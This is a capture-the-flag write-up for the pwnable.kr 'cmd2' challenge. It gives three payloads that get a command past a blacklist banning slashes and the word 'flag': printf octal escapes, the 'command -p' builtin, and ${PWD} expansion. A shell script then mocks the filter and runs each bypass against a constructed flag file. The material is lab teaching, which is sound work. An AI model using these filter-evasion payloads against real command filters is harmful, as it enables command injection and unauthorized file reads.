N/B Writeups
15 - cmd2


Last updated 4 years ago


The Challenge

Daddy bought me a system command shell. but he put some filters to prevent me from playing with it without his permission... but I wanna play anytime I want!

ssh cmd2@pwnable.kr -p2222 (pw:flag of cmd1)

The Solution

Another blacklisting challenge, this time on steroids. The binary wipes its environment and points PATH at a directory that contains no commands, so every command would normally have to be spelled with an absolute path, yet the filter rejects any argv[1] that contains a forward slash. It also rejects the literal string flag, which is why every payload below globs fla* instead. The filter only ever inspects the literal argument; whatever /bin/sh expands it into at run time is never checked, and all three solutions live in that gap.

Solution #1 - Octal Encoding

The printf builtin of dash (the /bin/sh that system() hands the string to) understands octal escapes such as \57 for the forward slash, but not hex escapes like \x2f. Surround the whole argument with single quotes so that your own login shell does not expand the $(...) command substitution before it reaches the binary: the filter must see the literal $(printf ...) text, and only the inner /bin/sh turns it into /bin/cat fla*, after which the glob expands to flag.

./cmd2 '$(printf "\57bin\57cat fla*")'

Solution #2 - Builtin Secrets

POSIX shells (dash as well as bash) have a builtin named command. With the -p flag it looks the command up in a built-in default PATH that is guaranteed to contain the standard utilities, ignoring the useless PATH the binary set, so cat resolves without its directory ever being spelled out.

./cmd2 'command -p cat fla*'

Solution #3 - ${PWD}

The shell keeps $PWD up to date on every cd even though the environment was wiped, and once you have climbed to the root directory $PWD expands to, well, a forward slash. Two cd .. take you from /home/cmd2 to /, and extra ones would be harmless since cd .. at the root stays there. After expansion the last command is simply /bin/cat /home/cmd2/fla*.

./cmd2 'cd ..;cd ..; ${PWD}bin${PWD}cat ${PWD}home${PWD}cmd2${PWD}fla*'
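To see the difference between what the filter inspects and what /bin/sh actually executes, here is an added example that is not part of the original writeup and not the challenge's own code: a shell stand-in for cmd2 (assuming a blacklist of only "/" and "flag", a wiped environment and a useless PATH, which is all the three solutions above rely on) run against a constructed flag file with a naive attempt, a bare cat, and the three payloads. The function names, the scratch directory and the flag value are made up for the example, and the ${PWD} payload is generalised with extra cd .. so it works from a directory of any depth rather than only from /home/cmd2.

```shell
#!/bin/sh
# Added example, not code from the writeup or from pwnable.kr: a local stand-in for
# the cmd2 binary so the three bypasses can be tried against a constructed flag
# file. Assumptions: /bin/cat exists, and a blacklist that rejects only "/" and
# "flag" is enough to demonstrate the bypasses (the real filter rejects more,
# but these two are the ones the payloads route around).

# The blacklist as the writeup describes it. Returns 0 (true) when rejected.
filter_rejects() {
    case "$1" in
        */*|*flag*) return 0 ;;
    esac
    return 1
}

# Stand-in for the challenge binary: the untouched argv[1] goes through the
# blacklist first, then to /bin/sh with an emptied environment and a useless
# PATH, which is what system() would run. $2 is the directory holding the flag.
mock_cmd2() {
    if filter_rejects "$1"; then
        return 1
    fi
    ( cd "$2" && env -i PATH=/no_command_execution_until_you_become_a_hacker /bin/sh -c "$1" )
}

# Scratch directory with a constructed flag file; prints the directory path.
make_fixture() {
    dir=$(mktemp -d)
    printf '%s\n' 'FLAG{constructed_for_the_example}' > "$dir/flag"
    printf '%s\n' "$dir"
}

# Payloads exactly as argv[1] would receive them (single-quoted in the caller's
# shell so nothing expands before the filter inspects the literal string).
payload_octal='$(printf "\57bin\57cat fla*")'
payload_command_p='command -p cat fla*'

# Solution #3 needs an absolute path spelled without "/": every slash becomes
# ${PWD}, which expands to "/" once the shell has climbed to the root.
slashless_path() {
    printf '%s\n' "$1" | sed 's|/|${PWD}|g'
}

# Solution #3 for a scratch directory of unknown depth: "cd .." at the root is
# harmless, so climb generously before spelling the path with ${PWD}.
payload_pwd() {
    climb='cd ..;cd ..;cd ..;cd ..;cd ..;cd ..;cd ..;cd ..;cd ..;cd ..;'
    printf '%s ${PWD}bin${PWD}cat %s${PWD}fla*\n' "$climb" "$(slashless_path "$1")"
}

# Runs a naive attempt, a bare cat, and the three bypasses, showing what the
# filter sees versus what /bin/sh ends up doing with it.
demo() {
    dir=$(make_fixture)
    for p in '/bin/cat flag' 'cat fla*' "$payload_octal" "$payload_command_p" "$(payload_pwd "$dir")"; do
        if filter_rejects "$p"; then
            printf 'REJECTED by filter: %s\n' "$p"
        else
            printf 'ACCEPTED: %s\n   -> %s\n' "$p" "$(mock_cmd2 "$p" "$dir" 2>&1)"
        fi
    done
    rm -rf "$dir"
}

demo
```

The bare cat fla* line is the instructive failure: it passes the blacklist but dies with "cat: not found" because PATH points nowhere, which is exactly why each working payload has to manufacture a slash (octal, ${PWD}) or sidestep PATH entirely (command -p).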